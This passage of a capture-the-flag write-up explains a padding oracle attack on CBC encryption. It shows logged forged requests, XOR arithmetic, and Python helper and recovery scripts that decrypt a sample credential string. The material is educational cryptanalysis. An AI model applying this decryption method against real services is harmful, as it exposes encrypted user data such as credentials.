When that byte is discovered, we can move to 0x03, and so on. Since there are 16 bytes in our blocks, and there must be at least one byte of padding, the attack for each of the 5 blocks ends when a full block of padding is identified. After identifying this full block that can be XORed with 0x10’s, the attacker starts over with the next block:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /dce6acb565dd951c642b9feeebcdffc9 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404 <- Got full block
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202001 084b0199778f14767cbdc989872a1f7d HTTP/1.1" 403 <- Starting over with next block

Looking through the logs is great actually because the attacker did all the work for us. We can ignore all of this byte-by-byte brute forcing and skip straight to the end of each block’s brute force where the full block of padding is identified. This is what the attacker was working towards anyways:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /dce6acb565dd951c642b9feeebcdffc9 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /afa631b5b91c019dd9dcd464e333b164 084b0199778f14767cbdc989872a1f7d HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /6b2866e615fb39441cccbdfdfe54684d a59da498c81017fd2adc534610b412e4 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /daffd5ebb46574cd5bbe267664c56c93 8f50d05513a440425f5ca434e5cb29c6 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /fa32af307095725b4645bd2dfcd230df b9110412ebeb347ee63a6b1849794f92 HTTP/1.1" 404

With these 5 lines of information, we have enough to decrypt the original string and solve the challenge. If you whip up a script to XOR the bytes of two blocks for you, you can start XORing stuff together. Or just do it interactively:

$ python
>>> 0xFFFFFFFF ^ 0x10101010
4025479151
>>> hex(0xFFFFFFFF ^ 0x10101010)
'0xefefefef'

We’ll build a quick list of intermediary values first, but note that to decrypt a block you XOR the intermediary value with the previous cipher text block (or IV for the first block) to get the clear text. The script used below just outputs the result of the XOR and also the corresponding ASCII.
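The xor.py script itself isn’t reproduced in this post, so here is a sketch of what such a helper could look like. It is a reconstruction, not the original: xor_hex and printable are made-up names, and unlike the raw output shown in this post it prints a dot for every non-printable byte instead of writing it to the terminal.

```python
import sys
from binascii import hexlify, unhexlify


def xor_hex(a_hex, b_hex):
    """XOR two equal-length hex strings and return the result as hex."""
    a = bytearray(unhexlify(a_hex))
    b = bytearray(unhexlify(b_hex))
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return hexlify(bytearray(x ^ y for x, y in zip(a, b))).decode("ascii")


def printable(hex_string):
    """Render bytes as ASCII, replacing non-printable bytes with dots."""
    data = bytearray(unhexlify(hex_string))
    return "".join(chr(c) if 32 <= c < 127 else "." for c in data)


if __name__ == "__main__" and len(sys.argv) == 3:
    result = xor_hex(sys.argv[1], sys.argv[2])
    print(result)
    print(printable(result))
```

Because hexlify always emits two characters per byte, small values such as 0x09 keep their leading zero in the hex output.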

We’ll XOR the results of the brute force against a full block of 0x10 padding for each of the 5 blocks.

$ python xor.py dce6acb565dd951c642b9feeebcdffc9 10101010101010101010101010101010
ccf6bca575cd850c743b8ffefbddefd9
????uͅ
     t;??????

$ python xor.py afa631b5b91c019dd9dcd464e333b164 10101010101010101010101010101010
bfb621a5a90c118dc9ccc474f323a174
??!??
     ????t?#?t

$ python xor.py 6b2866e615fb39441cccbdfdfe54684d 10101010101010101010101010101010
7b3876f605eb29540cdcadedee44785d
{8v??)T

       ܭ

$ python xor.py daffd5ebb46574cd5bbe267664c56c93 10101010101010101010101010101010
caefc5fba47564dd4bae366674d57c83
?????ud?K?6ft?|?

$ python xor.py fa32af307095725b4645bd2dfcd230df 10101010101010101010101010101010
ea22bf206085624b5655ad3decc220cf
?"? `?bKVU?=?? ?

Now we start decrypting the original blocks by taking each of these results and XOR-ing it with the cipher text of the previous block. The first cipher text block has no previous block, so we don’t actually need the first result from xor.py above.

$ python xor.py cac544d7942e50e1a0afa156c803d115 bfb621a5a90c118dc9ccc474f323a174
757365723d22416c696365223b207061
user="Alice"; pa

$ python xor.py 084b0199778f14767cbdc989872a1f7d 7b3876f605eb29540cdcadedee44785d
7373776f72643d2270616464696e6720
ssword="padding 

$ python xor.py a59da498c81017fd2adc534610b412e4 caefc5fba47564dd4bae366674d57c83
6f7261636c6573206172652064616e67
oracles are dang

$ python xor.py 8f50d05513a440425f5ca434e5cb29c6 ea22bf206085624b5655ad3decc220cf
65726f75732122090909090909090909
erous!" 

Our decrypted string: user=”Alice”; password=”padding oracles are dangerous!”
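For completeness, the whole recovery can be done in one pass. The sketch below is written for Python 3 and takes the five final 404 requests exactly as logged (forged block, target block); FINAL_404S, xor_bytes, and recover_plaintext are names chosen for this example. It assumes the trailing bytes are standard block padding, where the last byte gives the number of padding bytes to strip.

```python
# (forged block, target block) from the five final 404 log lines.
FINAL_404S = [
    ("dce6acb565dd951c642b9feeebcdffc9", "cac544d7942e50e1a0afa156c803d115"),
    ("afa631b5b91c019dd9dcd464e333b164", "084b0199778f14767cbdc989872a1f7d"),
    ("6b2866e615fb39441cccbdfdfe54684d", "a59da498c81017fd2adc534610b412e4"),
    ("daffd5ebb46574cd5bbe267664c56c93", "8f50d05513a440425f5ca434e5cb29c6"),
    ("fa32af307095725b4645bd2dfcd230df", "b9110412ebeb347ee63a6b1849794f92"),
]


def xor_bytes(a, b):
    """XOR two byte strings of equal length."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_plaintext(pairs, block_size=16):
    """Rebuild the plaintext from the full-padding forgeries."""
    full_pad = bytes([block_size]) * block_size
    plaintext = b""
    # Pair each target block with the cipher text block that precedes it.
    for (_, prev_cipher), (forged, _) in zip(pairs, pairs[1:]):
        intermediate = xor_bytes(bytes.fromhex(forged), full_pad)
        plaintext += xor_bytes(intermediate, bytes.fromhex(prev_cipher))
    pad_len = plaintext[-1]  # last byte says how much padding to strip
    return plaintext[:-pad_len]


print(recover_plaintext(FINAL_404S).decode("ascii"))
```

The first pair contributes only its target block, since that block acts as the previous cipher text for the block that follows it.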